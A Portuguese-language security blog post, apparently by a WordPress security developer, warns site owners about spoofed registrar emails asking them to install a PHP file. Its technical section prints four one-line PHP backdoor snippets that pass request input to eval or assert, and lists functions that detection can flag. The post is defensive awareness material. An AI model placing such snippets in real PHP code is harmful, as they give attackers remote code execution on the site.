Security Blog
Security Blog

Não confie os e-mails de confirmação falso domínio

Se você receber uma carta de qualquer tipo que solicite a criação, download ou instalação de algum código PHP em seu site, você deve ignorá-lo


English version: Do not trust those fake domain confirmation emails


Recentemente, alguns dos meus clientes receberam estranhas cartas de e-mail de seus registradores de domínio. Essas cartas contêm um pedido de domínios de confirmação próprios. Eu chequei uma daquelas cartas e rapidamente identifiquei como uma carta fraudulenta . Todas as letras têm um padrão idêntico e uma solicitação para criar um arquivo PHP na pasta raiz de um site com um nome específico e o conteúdo fornecido. Escusado será dizer que o conteúdo sugerido para esse arquivo PHP contém código malicioso conhecido como código backdoor. Esse tipo de código permite que o invasor execute qualquer ação que desejar no site da vítima.

Se você receber uma carta de qualquer tipo que solicite a criação, download ou instalação de algum código PHP em seu site, você deve ignorá-lo. Sem exceções. Mesmo que a carta venha do presidente ou da sua mãe.

As cartas fraudulentas parecem legítimas devido ao endereço de email legítimo. Mas é um spoofing de email. Você não espera receber um e-mail falso de seus amigos ou do registrador de domínios. Certo? Não! Qualquer carta de email pode conter qualquer endereço de email. A grande maioria dos servidores de email e clientes de email não verifica ou verifica o endereço do remetente. Então, você vê isso como um hacker queria. Você não deve confiar em nenhuma carta de e-mail recebida do remetente conhecido se a carta contiver uma solicitação para alguma ação suspeita, como a instalação de código em seu site ou aplicativo em seu computador.

Detalhes técnicos

E-mails falsos geralmente contêm algumas das seguintes linhas do PHP.

assert(stripslashes($_REQUEST['something']));

eval(stripslashes($_REQUEST['something']));

assert(base64_decode($_REQUEST['something']));

eval(base64_decode($_REQUEST['something']));

FYI: base64_decode, eval e assert são marcadores bem conhecidos de código PHP suspeito ou malicioso.

Veja também: Plugin Inspector revela problemas de segurança com outros plugins


I'm a team lead in Cerber Tech. I'm a software & database architect, WordPress - PHP - SQL - JavaScript developer. I started coding in 1993 on IBM System/370 (yeah, that was amazing days) and today software engineering at Cerber Tech is how I make my living. I've taught to have high standards for myself as well as using them in developing software solutions.

View Comments
There are currently no comments.